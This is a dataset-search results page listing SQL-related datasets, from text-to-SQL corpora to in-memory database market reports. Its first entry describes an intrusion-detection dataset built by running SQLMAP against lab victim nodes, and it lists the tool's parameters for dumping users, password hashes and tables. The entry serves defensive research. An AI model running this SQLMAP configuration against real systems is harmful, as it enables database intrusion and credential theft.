100+ datasets found

j
Data from: SQL Injection Attack Netflow
portalcienciaytecnologia.jcyl.es
portalcientifico.unileon.es
+2more
Updated 2022
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Crespo, Ignacio; Campazas, Adrián; Crespo, Ignacio; Campazas, Adrián (2022). SQL Injection Attack Netflow [Dataset]. https://portalcienciaytecnologia.jcyl.es/documentos/668fc461b9e7c03b01bdba14
Explore at:
Dataset updated
2022
Authors
Crespo, Ignacio; Campazas, Adrián; Crespo, Ignacio; Campazas, Adrián
Description
Introduction This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used. NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device. Datasets The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2). The datasets contain both benign and malicious traffic. All collected datasets are balanced. The version of NetFlow used to build the datasets is 5. Dataset Aim Samples Benign-malicious
traffic ratio D1 Training 400,003 50% D2 Test 57,239 50% Infrastructure and implementation Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows. DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes) Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet). The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities. The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table. Parameters Description '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema' Enumerate users, password hashes, privileges, roles, databases, tables and columns --level=5 Increase the probability of a false positive identification --risk=3 Increase the probability of extracting data --random-agent Select the User-Agent randomly --batch Never ask for user input, use the default behavior --answers="follow=Y" Predefined answers to yes Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer). The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24.
The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases. However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes. To run the MySQL server we ran MariaDB version 10.4.12.
Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.
h
sql-create-context-instruction
huggingface.co
Updated Sep 9, 2023
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Spartak Bughdaryan (2023). sql-create-context-instruction [Dataset]. https://huggingface.co/datasets/bugdaryan/sql-create-context-instruction
Explore at:
CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
Dataset updated
Sep 9, 2023
Authors
Spartak Bughdaryan
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
Overview

This dataset is built upon SQL Create Context, which in turn was constructed using data from WikiSQL and Spider. There are 78,577 examples of natural language queries, SQL CREATE TABLE statements, and SQL Query answering the question using the CREATE statement as context. This dataset was built with text-to-SQL LLMs in mind, intending to prevent hallucination of column and table names often seen when trained on text-to-SQL datasets. The CREATE TABLE statement can often be… See the full description on the dataset page: https://huggingface.co/datasets/bugdaryan/sql-create-context-instruction.
h
wikisql-generate
huggingface.co
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
wikisql-generate [Dataset]. https://huggingface.co/datasets/tjaffri/wikisql-generate
Explore at:
CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
Authors
Taqi Jaffri
License
https://choosealicense.com/licenses/bsd-3-clause/https://choosealicense.com/licenses/bsd-3-clause/
Description
WikiSQL Dataset (Reformatted for Generative Models)

This is the exact same dataset as WikiSQL: https://huggingface.co/datasets/wikisql, but with the data reformatted to allow direct use with text generation LLMs. The original license and credits for the original dataset remain in place. Specifically, the changes from standard WikiSQL are:

The table details in WikiSQL were included as dictionaries but tools like LangChain and LlamaIndex build their prompts using a SQL DESCRIBE of… See the full description on the dataset page: https://huggingface.co/datasets/tjaffri/wikisql-generate.
Z
Stack Overflow Chat Dutch
data.niaid.nih.gov
Updated Jun 20, 2023
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Vanroy, Bram (2023). Stack Overflow Chat Dutch [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_8052379
Explore at:
Dataset updated
Jun 20, 2023
Dataset authored and provided by
Vanroy, Bram
License
http://www.apache.org/licenses/LICENSE-2.0http://www.apache.org/licenses/LICENSE-2.0
Description
This dataset contains 56,964 conversations between een AI assistant and a (fake) "Human" (generated) in Dutch, specifically in the domain of programming (Stack Overflow). They are translations of Baize's machine-generated answers to the Stack Overflow dataset.

Data Instances

{'id': 9, 'input': 'Het gesprek tussen de mens en de AI-assistent. ' '[|Human|] Ik heb wat hulp nodig met Spark SQL union en het ordenen ' 'van kolommen. ' '[|AI|] Natuurlijk, ik help je graag. Waar heb je specifiek hulp ' 'bij nodig? ' '[|Human|] Ik wil de output van een UNION-query ordenen op een ' 'kolom die niet aanwezig is in de SELECT-instructie. Is dat ' 'mogelijk? ' '[|AI|] Ja, het is mogelijk met Spark SQL. Je kunt de ordinale ' 'positie van de kolom in de ORDER BY-clausule gebruiken in plaats ' 'van de kolomnaam. Als je bijvoorbeeld wilt ordenen op de derde ' 'kolom in de SELECT-instructie, kun je ORDER BY 3 gebruiken. ' '[|Human|] Dat is nuttig. Kan ik ook een alias gebruiken in de ' 'ORDER BY-clausule? ' '[|AI|] Ja, je kunt een alias gebruiken in de ORDER BY-clausule. De ' 'alias moet worden gedefinieerd in de SELECT-instructie. Als je ' 'bijvoorbeeld de derde kolom als "col3" alias geeft, kun je ordenen ' 'met ORDER BY col3. ' '[|Human|] Oké, ik denk dat ik het begrijp. Kan ik dezelfde alias ' 'gebruiken voor kolommen uit beide tabellen in de UNION? ' '[|AI|] Nee, je kunt dezelfde alias niet gebruiken voor kolommen ' 'uit beide tabellen in de UNION. Elke tabel in de UNION moet een ' 'unieke alias hebben voor de kolommen. ' '[|Human|] ', 'topic': 'Spark SQL UNION - ORDER BY kolom niet in SELECT'},

Data Fields

id: the ID of the item. The following 82 IDs are not included because they could not be translated: [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992]

input: the machine-generated conversation between AI and "Human". Always starts with Het gesprek tussen de mens en de AI-assistent. and has at least one occurrence of both [|AI|] and [|Human|].

topic: the topic description

Dataset Creation

Both the translations and the topics were translated with OpenAI's API for gpt-3.5-turbo. max_tokens=1024, temperature=0 as parameters.

The prompt template to translate the input is (where src_lang was English and tgt_lang Dutch):

CONVERSATION_TRANSLATION_PROMPT = """You are asked to translate a conversation between an AI assistant and a human from {src_lang} into {tgt_lang}.

Here are the requirements that you should adhere to: 1. maintain the format: the conversation consists of the AI (marked as [|AI|]) and the human ([|Human|]) talking in turns and responding to each other; 2. do not translate the speaker identifiers [|AI|] and [|Human|] but always copy them into the translation in appropriate places; 3. ensure accurate translation and keep the correctness of the conversation; 4. make sure that text is fluent to read and does not contain grammatical errors. Use standard {tgt_lang} without regional bias; 5. translate the human's text using informal, but standard, language; 6. make sure to avoid biases (such as gender bias, grammatical bias, social bias); 7. if the human asks to correct grammar mistakes or spelling mistakes then you have to generate a similar mistake in {tgt_lang}, and then also generate a corrected output version for the AI in {tgt_lang}; 8. if the human asks to translate text from one to another language, then you only translate the human's question to {tgt_lang} but you keep the translation that the AI provides in the language that the human requested; 9. do not translate code fragments but copy them as they are. If there are English examples, variable names or definitions in code fragments, keep them in English.

Now translate the following conversation with the requirements set out above. Do not provide an explanation and do not add anything else.

"""

The prompt to translate the topic is:

TOPIC_TRANSLATION_PROMPT = "Translate the following title of a conversation from {src_lang} to {tgt_lang} in a succinct,"
" summarizing manner. Translate accurately and formally. Do not provide any explanation"
" about the translation and do not include the original title.

"

The system message was:

You are a helpful assistant that translates English to Dutch to the requirements that are given to you.

Note that 82 items (0.1%) were not successfully translated. The translation was missing the AI identifier [|AI|] and/or the human one [|Human|]. The IDs for the missing items are [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992].

The translation quality has not been verified. Use at your own risk!

Licensing Information

Licensing info for Stack Overflow Questions is listed as Apache 2.0. If you use the current dataset, you should also adhere to the original license.

This text was generated (either in part or in full) with GPT-3 (gpt-3.5-turbo), OpenAI’s large-scale language-generation model. Upon generating draft language, the author reviewed, edited, and revised the language to their own liking and takes ultimate responsibility for the content of this publication.

If you use this dataset, you must also follow the Sharing and Usage policies.

As clearly stated in their Terms of Use, specifically 2c.iii, "[you may not] use output from the Services to develop models that compete with OpenAI". That means that you cannot use this dataset to build models that are intended to commercially compete with OpenAI. As far as I am aware, that is a specific restriction that should serve as an addendum to the current license.

This dataset is also available on the Hugging Face hub with the same DOI and license. See that README for more info.
O
sql-create-context
opendatalab.com
huggingface.co
zip
Updated Apr 21, 2023
+ more versions
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
(2023). sql-create-context [Dataset]. https://opendatalab.com/OpenDataLab/sql-create-context
Explore at:
zipAvailable download formats
Dataset updated
Apr 21, 2023
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
This dataset builds from WikiSQL and Spider. There are 78,577 examples of natural language queries, SQL CREATE TABLE statements, and SQL Query answering the question using the CREATE statement as context. This dataset was built with text-to-sql LLMs in mind, intending to prevent hallucination of column and table names often seen when trained on text-to-sql datasets. The CREATE TABLE statement can often be copy and pasted from different DBMS and provides table names, column names and their data types. By providing just the CREATE TABLE statement as context, we can hopefully provide better grounding for models without having to provide actual rows of data, limiting token usage and exposure to private, sensitive, or proprietary data.
h
synthetic_text_to_sql
huggingface.co
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Gretel.ai, synthetic_text_to_sql [Dataset]. https://huggingface.co/datasets/gretelai/synthetic_text_to_sql
Explore at:
CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
Dataset provided by
Gretel.ai
License
Apache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
Description
Image generated by DALL-E. See prompt for more details

synthetic_text_to_sql

gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:

105,851 records partitioned into 100,000 train and 5,851 test records ~23M total tokens, including ~12M SQL tokens Coverage across 100 distinct… See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.
o
Contextual Portuguese Text2SQL
opendatabay.com
.undefined
Updated Jul 7, 2025
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Datasimple (2025). Contextual Portuguese Text2SQL [Dataset]. https://www.opendatabay.com/data/ai-ml/e4213f60-3136-497b-a7ac-09504fbd0b79
Explore at:
.undefinedAvailable download formats
Dataset updated
Jul 7, 2025
Dataset authored and provided by
Datasimple
Area covered
Data Science and Analytics
Description
This dataset is a Portuguese-translated version of the b-mc2/sql-create-context dataset, constructed from the WikiSQL and Spider datasets. It contains examples of questions in Portuguese, SQL CREATE TABLE statements, and SQL queries that answer the questions using the CREATE TABLE statement as context. The main goal of this dataset is to assist Portuguese natural language models in generating precise and contextualised SQL queries, preventing the hallucination of column and table names, a common issue in text-to-SQL datasets. By providing only the CREATE TABLE statement as context, the dataset aims to better ground the models without the need to provide actual data rows, limiting token use and exposure to private, sensitive, or proprietary data.

Columns

pergunta: The question in natural language about the database, in Portuguese.

contexto: The SQL CREATE TABLE statement that provides the necessary context to answer the question, representing the schema or structure of the database tables, in Portuguese.

resposta: The SQL query that answers the question based on the provided context, in Portuguese.

Distribution

This dataset consists of 78,577 entries. Each entry represents a question about a database, the context of the database schema, and the corresponding SQL query. Data files are typically in CSV format. The 'pergunta' column contains 78,220 unique values, 'contexto' has 72,947 unique values, and 'resposta' has 78,577 unique values.

Usage

This dataset is ideal for: * Training natural language models for SQL query generation, especially in scenarios where accuracy in naming columns and tables is crucial. * Enhancing model performance in text-to-SQL tasks. * Supporting natural language processing and machine learning tasks related to generating structured queries from natural language.

Coverage

The dataset has a global region scope and focuses on the Portuguese language. The questions were translated into Portuguese using the facebook/nllb-200-distilled-1.3B model. It was listed on 22/06/2025.

License

CC-BY-NC

Who Can Use It

This dataset is suitable for: * Data scientists and analysts focused on developing and refining natural language processing models. * Researchers and developers working on text-to-SQL solutions. * Anyone aiming to build or improve AI models that translate natural language queries into SQL, particularly for Portuguese.

Dataset Name Suggestions

Portuguese Text2SQL Database

NL to SQL Portuguese Dataset

SQL Query Generation from Portuguese Text

Portuguese Natural Language to SQL

Contextual Portuguese Text2SQL

Attributes

Original Data Source: Portuguese Text2SQL database
P
WikiSQL Dataset
paperswithcode.com
opendatalab.com
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Victor Zhong; Caiming Xiong; Richard Socher, WikiSQL Dataset [Dataset]. https://paperswithcode.com/dataset/wikisql
Explore at:
Authors
Victor Zhong; Caiming Xiong; Richard Socher
Description
WikiSQL consists of a corpus of 87,726 hand-annotated SQL query and natural language question pairs. These SQL queries are further split into training (61,297 examples), development (9,145 examples) and test sets (17,284 examples). It can be used for natural language inference tasks related to relational databases.
v
Global SQL In-Memory Database Market Size By Type (SQL, Relational data...
verifiedmarketresearch.com
Updated Jun 17, 2023
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
VERIFIED MARKET RESEARCH (2023). Global SQL In-Memory Database Market Size By Type (SQL, Relational data type, NEWSQL), By Application (Reporting, Transaction, Analytics), By Geographic Scope And Forecast [Dataset]. https://www.verifiedmarketresearch.com/product/sql-in-memory-database-market/
Explore at:
Dataset updated
Jun 17, 2023
Dataset authored and provided by
VERIFIED MARKET RESEARCH
License
https://www.verifiedmarketresearch.com/privacy-policy/https://www.verifiedmarketresearch.com/privacy-policy/
Time period covered
2026 - 2032
Area covered
Global
Description
SQL In-Memory Database Market size was valued at USD 9.26 Billion in 2024 and is projected to reach USD 35.7 Billion by 2032, growing at a CAGR of 20.27% from 2026 to 2032.

SQL In-Memory Database Market Drivers

Demand for Real-Time Analytics and Processing: Businesses increasingly require real-time insights from their data to make faster and more informed decisions. SQL In-Memory databases excel at processing data much faster than traditional disk-based databases, enabling real-time analytics and operational dashboards.

Growth of Big Data and IoT Applications: The rise of Big Data and the Internet of Things (IoT) generates massive amounts of data that needs to be processed quickly. SQL In-Memory databases can handle these high-velocity data streams efficiently due to their in-memory architecture.

Improved Performance for Transaction Processing Systems (TPS): In-memory databases offer significantly faster query processing times compared to traditional databases. This translates to improved performance for transaction-intensive applications like online banking, e-commerce platforms, and stock trading systems.

Reduced Hardware Costs (in some cases): While implementing an in-memory database might require an initial investment in additional RAM, it can potentially reduce reliance on expensive high-performance storage solutions in specific scenarios.

Focus on User Experience and Application Responsiveness: In today's digital landscape, fast and responsive applications are crucial. SQL In-Memory databases contribute to a smoother user experience by enabling quicker data retrieval and transaction processing.

However, it's important to consider some factors that might influence market dynamics:

Limited Data Capacity: In-memory databases are typically limited by the amount of available RAM, making them less suitable for storing massive datasets compared to traditional disk-based solutions.

Higher Implementation Costs: Setting up and maintaining an in-memory database can be more expensive due to the additional RAM requirements compared to traditional databases.

Hybrid Solutions: Many organizations opt for hybrid database solutions that combine in-memory and disk-based storage, leveraging the strengths of both for different data sets and applications.
SQL Bike Stores
kaggle.com
Updated Nov 21, 2024
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Mohamed ZRIRAK (2024). SQL Bike Stores [Dataset]. https://www.kaggle.com/datasets/mohamedzrirak/sql-bkestores
Explore at:
CroissantCroissant is a format for machine-learning datasets. Learn more about this at mlcommons.org/croissant.
Dataset updated
Nov 21, 2024
Dataset provided by
Kagglehttp://kaggle.com/
Authors
Mohamed ZRIRAK
License
https://creativecommons.org/publicdomain/zero/1.0/https://creativecommons.org/publicdomain/zero/1.0/
Description
Download: SQL Query This SQL project is focused on analyzing sales data from a relational database to gain insights into customer behavior, store performance, product sales, and the effectiveness of sales representatives. By executing a series of complex SQL queries across multiple tables, the project aggregates key metrics, such as total units sold and total revenue, and links them with customer, store, product, and staff details.

Key Objectives:

Customer Analysis: Understand customer purchasing patterns by analyzing the total number of units and revenue generated per customer. Product and Category Insights: Evaluate product performance and its category’s impact on overall sales. Store Performance: Identify which stores generate the most revenue and handle the highest sales volume. Sales Representative Effectiveness: Assess the performance of sales representatives by linking sales data with each representative’s handled orders. Techniques Used:

SQL Joins: The project integrates data from multiple tables, including orders, customers, order_items, products, categories, stores, and staffs, using INNER JOIN to merge information from related tables. Aggregation: SUM functions are used to compute total units sold and revenue generated by each order, providing valuable insights into sales performance. Grouping: Data is grouped by order ID, customer, product, store, and sales representative, ensuring accurate and summarized sales metrics. Use Cases:

Business Decision-Making: The analysis can help businesses identify high-performing products and stores, optimize inventory, and evaluate the impact of sales teams. Market Segmentation: Segment customers based on geographic location (city/state) and identify patterns in purchasing behavior. Sales Strategy Optimization: Provide recommendations to improve sales strategies by analyzing product categories and sales rep performance.
D
NEWSQL In Memory Database Market Report | Global Forecast From 2025 To 2033
dataintelo.com
csv, pdf, pptx
Updated Jan 7, 2025
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Dataintelo (2025). NEWSQL In Memory Database Market Report | Global Forecast From 2025 To 2033 [Dataset]. https://dataintelo.com/report/global-newsql-in-memory-database-market
Explore at:
pdf, csv, pptxAvailable download formats
Dataset updated
Jan 7, 2025
Dataset authored and provided by
Dataintelo
License
https://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy
Time period covered
2024 - 2032
Area covered
Global
Description
NEWSQL In Memory Database Market Outlook

The global market size for NEWSQL In Memory Databases was estimated at USD 3.8 billion in 2023 and is projected to reach USD 10.9 billion by 2032, growing at a remarkable compound annual growth rate (CAGR) of 12.3% during the forecast period. The growth of this market is primarily driven by the increasing demand for high-speed data processing and real-time analytics across various industries. As businesses continue to generate vast amounts of data, there is a growing need for efficient database management solutions that can handle these large data volumes with low latency. The adoption of NEWSQL In Memory databases, which combine the scalability of NoSQL with the ACID compliance of traditional SQL databases, is thus on the rise.

The demand for real-time data analytics and processing is a significant growth driver for the NEWSQL In Memory Database market. As industries such as BFSI, healthcare, and retail increasingly rely on data-driven decision-making processes, the need for fast and efficient database solutions becomes paramount. NEWSQL In Memory databases provide the ability to process large datasets quickly, enabling businesses to gain insights and make decisions in real time. This is particularly crucial in sectors like finance and healthcare, where timely information can significantly impact outcomes.

The advent of technologies such as artificial intelligence (AI), machine learning (ML), and Internet of Things (IoT) also fuels the growth of the NEWSQL In Memory Database market. These technologies generate immense amounts of data, requiring robust database solutions that can handle high-throughput and low-latency transactions. NEWSQL In Memory databases are well-suited for these applications, providing the necessary speed and scalability to manage the data efficiently. Furthermore, the rising adoption of cloud computing and the shift towards digital transformation in various industries further bolster the market's expansion.

Another crucial factor contributing to the market's growth is the increasing emphasis on customer experience and personalized services. Businesses are leveraging data to understand customer behavior, preferences, and trends to offer tailored experiences. NEWSQL In Memory databases enable organizations to analyze customer data in real time, enhancing their ability to provide personalized services. This is evident in the retail sector, where businesses use real-time analytics to optimize inventory, improve customer engagement, and boost sales.

In-Memory Grid technology plays a pivotal role in enhancing the performance of NEWSQL In Memory databases. By storing data in the main memory, In-Memory Grids significantly reduce data retrieval times, allowing for faster data processing and real-time analytics. This capability is particularly beneficial in scenarios where rapid access to data is crucial, such as in financial transactions or healthcare diagnostics. The integration of In-Memory Grid technology with NEWSQL databases not only boosts speed but also improves scalability, enabling businesses to handle larger datasets efficiently. As industries continue to demand high-speed data processing solutions, the adoption of In-Memory Grids is expected to rise, further driving the growth of the NEWSQL In Memory Database market.

On a regional level, North America holds a significant share of the NEWSQL In Memory Database market, driven by the presence of major technology companies and early adoption of advanced database solutions. The Asia Pacific region is expected to witness the highest growth rate during the forecast period, owing to the rapid digitalization and increasing investments in technology infrastructure. Europe also shows substantial potential, with a growing focus on data-driven strategies and compliance with stringent data regulations.

Type Analysis

The NEWSQL In Memory Database market can be segmented by type into operational and analytical databases. Operational databases are designed to handle real-time transaction processing, making them ideal for applications that require fast and efficient data entry and retrieval. These databases are commonly used in industries such as finance, retail, and telecommunications, where the ability to process transactions quickly is critical. The demand for operational NEWSQL In Memory databases is growing as businesses increasingly rely on real-time data for decision-making and operational efficiency.

<br /&
D
SQL In Memory Database Market Report | Global Forecast From 2025 To 2033
dataintelo.com
csv, pdf, pptx
Updated Jan 7, 2025
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Dataintelo (2025). SQL In Memory Database Market Report | Global Forecast From 2025 To 2033 [Dataset]. https://dataintelo.com/report/global-sql-in-memory-database-market
Explore at:
pdf, csv, pptxAvailable download formats
Dataset updated
Jan 7, 2025
Dataset authored and provided by
Dataintelo
License
https://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy
Time period covered
2024 - 2032
Area covered
Global
Description
SQL In Memory Database Market Outlook

The global SQL in-memory database market size is projected to grow significantly from $6.5 billion in 2023 to reach $17.2 billion by 2032, reflecting a robust compound annual growth rate (CAGR) of 11.4%. This growth is driven by the increasing demand for high-speed data processing and real-time analytics across various sectors.

The primary growth factor for the SQL in-memory database market is the increasing need for real-time data processing capabilities. As businesses across the globe transition towards digitalization and data-driven decision-making, the demand for solutions that can process large volumes of data in real time is surging. In-memory databases, which store data in the main memory rather than on disk, offer significantly faster data retrieval speeds compared to traditional disk-based databases, making them an ideal solution for applications requiring real-time analytics and high transaction processing speeds.

Another significant growth driver is the rising adoption of big data and advanced analytics. Organizations are increasingly leveraging big data technologies to gain insights and make informed decisions. SQL in-memory databases play a crucial role in this context by enabling faster data processing and analysis, thus allowing businesses to quickly derive actionable insights from large datasets. This capability is particularly beneficial in sectors such as finance, healthcare, and retail, where real-time data processing is essential for operational efficiency and competitive advantage.

Furthermore, the growing trend of cloud computing is also propelling the SQL in-memory database market. Cloud deployment offers several advantages, including scalability, cost efficiency, and flexibility, which are driving businesses to adopt cloud-based in-memory database solutions. The increasing adoption of cloud services is expected to further boost the market growth as more enterprises migrate their data and applications to the cloud to leverage these benefits.

In-Memory Data Grids are becoming increasingly relevant in the SQL in-memory database market due to their ability to provide scalable and distributed data storage solutions. These grids enable organizations to manage large volumes of data across multiple nodes, ensuring high availability and fault tolerance. By leveraging in-memory data grids, businesses can achieve faster data processing and improved application performance, which is crucial for real-time analytics and decision-making. The integration of in-memory data grids with SQL databases allows for seamless data access and manipulation, enhancing the overall efficiency of data-driven applications. As the demand for high-speed data processing continues to grow, the adoption of in-memory data grids is expected to rise, providing significant opportunities for market expansion.

Regionally, North America is expected to dominate the SQL in-memory database market, followed by Europe and the Asia Pacific. The presence of key market players, advanced IT infrastructure, and early adoption of innovative technologies are some of the factors contributing to the market's growth in North America. Additionally, the Asia Pacific region is anticipated to witness the highest growth rate during the forecast period, driven by the rapid digital transformation initiatives, increasing investment in IT infrastructure, and the growing adoption of cloud services in countries like China, India, and Japan.

Component Analysis

The SQL In Memory Database market can be segmented into three primary components: Software, Hardware, and Services. Software solutions form the backbone of in-memory databases, comprising database management systems and other necessary applications for data processing. These software solutions are designed to leverage the speed and efficiency of in-memory storage to deliver superior performance in data-intensive applications. The ongoing advancements in software technology, such as enhanced data compression and indexing, are further driving the adoption of in-memory database software. The increasing need for high-performance computing and the rise of big data analytics are also significant factors contributing to the growth of this segment.

Hardware components are integral to the SQL in-memory database market as they provide the necessary infrastructure to support high-speed data processing. This segment includes high-capacity servers, memory chip
PLBD (Protein Ligand Binding Database) table description XML file
zenodo.org
data.niaid.nih.gov
zip
Updated Dec 26, 2022
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Darius Lingė; Darius Lingė; Marius Gedgaudas; Marius Gedgaudas; Andrius Merkys; Andrius Merkys; Vytautas Petrauskas; Vytautas Petrauskas; Antanas Vaitkus; Antanas Vaitkus; Algirdas Grybauskas; Algirdas Grybauskas; Vaida Paketurytė; Vaida Paketurytė; Asta Zubrienė; Asta Zubrienė; Audrius Zakšauskas; Audrius Zakšauskas; Aurelija Mickevičiūtė; Aurelija Mickevičiūtė; Joana Smirnovienė; Joana Smirnovienė; Lina Baranauskienė; Lina Baranauskienė; Edita Čapkauskaitė; Edita Čapkauskaitė; Virginija Dudutienė; Virginija Dudutienė; Ernestas Urniežius; Ernestas Urniežius; Aleksandras Konovalovas; Egidijus Kazlauskas; Egidijus Kazlauskas; Saulius Gražulis; Saulius Gražulis; Daumantas Matulis; Daumantas Matulis; Aleksandras Konovalovas (2022). PLBD (Protein Ligand Binding Database) table description XML file [Dataset]. http://doi.org/10.5281/zenodo.7482008
Explore at:
zipAvailable download formats
Unique identifier
https://doi.org/10.5281/zenodo.7482008
Dataset updated
Dec 26, 2022
Dataset provided by
Zenodohttp://zenodo.org/
Authors
Darius Lingė; Darius Lingė; Marius Gedgaudas; Marius Gedgaudas; Andrius Merkys; Andrius Merkys; Vytautas Petrauskas; Vytautas Petrauskas; Antanas Vaitkus; Antanas Vaitkus; Algirdas Grybauskas; Algirdas Grybauskas; Vaida Paketurytė; Vaida Paketurytė; Asta Zubrienė; Asta Zubrienė; Audrius Zakšauskas; Audrius Zakšauskas; Aurelija Mickevičiūtė; Aurelija Mickevičiūtė; Joana Smirnovienė; Joana Smirnovienė; Lina Baranauskienė; Lina Baranauskienė; Edita Čapkauskaitė; Edita Čapkauskaitė; Virginija Dudutienė; Virginija Dudutienė; Ernestas Urniežius; Ernestas Urniežius; Aleksandras Konovalovas; Egidijus Kazlauskas; Egidijus Kazlauskas; Saulius Gražulis; Saulius Gražulis; Daumantas Matulis; Daumantas Matulis; Aleksandras Konovalovas
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
PLBD (Protein Ligand Binding Database) table description XML file
=================================================================

General
-------

The provided ZIP archive contains an XML file "main-database-description.xml" with the description of all tables (VIEWS) that are exposed publicly at the PLBD server (https://plbd.org/). In the XML file, all columns of the visible tables are described, specifying their SQL types, measurement units, semantics, calculation formulae, SQL statements that can be used to generate values in these columns, and publications of the formulae derivations.

The XML file conforms to the published XSD schema created for descriptions of relational databases for specifications of scientific measurement data. The XSD schema ("relational-database_v2.0.0-rc.18.xsd") and all included sub-schemas are provided in the same archive for convenience. All XSD schemas are validated against the "XMLSchema.xsd" schema from the W3C consortium.

The ZIP file contains the excerpt from the files hosted in the https://plbd.org/ at the moment of submission of the PLBD database in the Scientific Data journal, and is provided to conform the journal policies. The current data and schemas should be fetched from the published URIs:

https://plbd.org/
https://plbd.org/doc/db/schemas
https://plbd.org/doc/xml/schemas

Software that is used to generate SQL schemas, RestfulDB metadata and the RestfulDB middleware that allows to publish the databases generated from the XML description on the Web are available at public Subversion repositories:

svn://www.crystallography.net/solsa-database-scripts
svn://saulius-grazulis.lt/restfuldb

Usage
-----

The unpacked ZIP file will create the "db/" directory with the tree layout given below. In addition to the database description file "main-database-description.xml", all XSD schemas necessary for validation of the XML file are provided. On a GNU/Linux operating system with a GNU Make package installed, the XML file validity can be checked by unpacking the ZIP file, entering the unpacked directory, and running 'make distclean; make'. For example, on a Linux Mint distribution, the following commands should work:

unzip main-database-description.zip
cd db/release/v0.10.0/tables/
sh -x dependencies/Linuxmint-20.1/install.sh
make distclean
make

